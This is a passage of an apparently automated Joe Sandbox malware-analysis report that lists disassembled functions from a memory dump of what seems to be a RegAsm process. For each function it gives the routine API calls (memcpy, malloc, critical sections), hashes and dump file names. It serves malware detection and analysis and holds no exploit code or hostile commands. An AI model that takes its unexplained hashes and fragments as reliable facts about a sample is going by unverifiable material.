                                                        • Instruction ID: b5b37954a7ef95b00466eb10e03601eb3a3a665e6ba98ef9df5c99400e63585d
                                                        • Opcode Fuzzy Hash: 0c78bcedb3a636b3296a1999f4eef0ff30d8856bb4ed3d6428b6e77f8e4abe5c
                                                        • Instruction Fuzzy Hash: 12310475A012168FDB10DF58C854A9ABBF6FF80305F168629C8179B301EB36E956CBE0
                                                        Function 6C0FF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0FF611
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0FF623
                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0FF652
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0FF668
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                        • Instruction ID: dd71697da23465c68ce2c8fcbf0cab1219d7d8b9ee323104b76ce476d40599a5
                                                        • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                        • Instruction Fuzzy Hash: CE313E71A00224AFCB14CF69CCC0B9EB7F9EB84758B148539EA598BB04D631E985CB90
                                                        Function 6C0C39A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E744,6C127765,00000000,6C127765,?,6C0E6112), ref: 6C0C39AF
                                                        • LeaveCriticalSection.KERNEL32(6C14E744,?,6C0E6112), ref: 6C0C3A34
                                                        • EnterCriticalSection.KERNEL32(6C14E784,6C0E6112), ref: 6C0C3A4B
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3A5F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 41989523ddcec36b36275ed9a7e72ca029e1f7f4306f23ad179dcf3cf97e413d
                                                        • Instruction ID: 46ae80d2070bc47df3392dda36c4d4cafc1bfcb5aa0baa71ee9eba98e9aaf363
                                                        • Opcode Fuzzy Hash: 41989523ddcec36b36275ed9a7e72ca029e1f7f4306f23ad179dcf3cf97e413d
                                                        • Instruction Fuzzy Hash: 15213532301A018FC724EB65C456BAEB3F1EF8A72CB288529C96597F40D730A941DBD2
                                                        Function 6C0DB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0DB96F
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C0DB99A
                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0DB9B0
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0DB9B9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy$freemalloc
                                                        • String ID:
                                                        • API String ID: 3313557100-0
                                                        • Opcode ID: eb87c5e74f43534d782a94ae1e503943bdd2e304ab161ffcc5fa07bc12da7be4
                                                        • Instruction ID: 8254f86439cc58b3f9502ebd9ac47d35942fe95341addb7925f51e935b502c00
                                                        • Opcode Fuzzy Hash: eb87c5e74f43534d782a94ae1e503943bdd2e304ab161ffcc5fa07bc12da7be4
                                                        • Instruction Fuzzy Hash: F9117FB5A003059FCB04DF69D8809ABF7F8BF98314B14853AE919D7701D731E9198AA0
                                                        Function 6C1126B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free
                                                        • String ID:
                                                        • API String ID: 1294909896-0
                                                        • Opcode ID: 7817f3fc460e1bc49c678526076a6fa3b9636ed2ab251b4f43c20e789dbd3e68
                                                        • Instruction ID: 72c710412987aea40e4e37dd7aaa98d6a1c815374beb208a67006aacebb49c96
                                                        • Opcode Fuzzy Hash: 7817f3fc460e1bc49c678526076a6fa3b9636ed2ab251b4f43c20e789dbd3e68
                                                        • Instruction Fuzzy Hash: 57F0F9B67052005BE7109B18D884A5B73A9EF6631CB540035EE16C3F01E336F919C692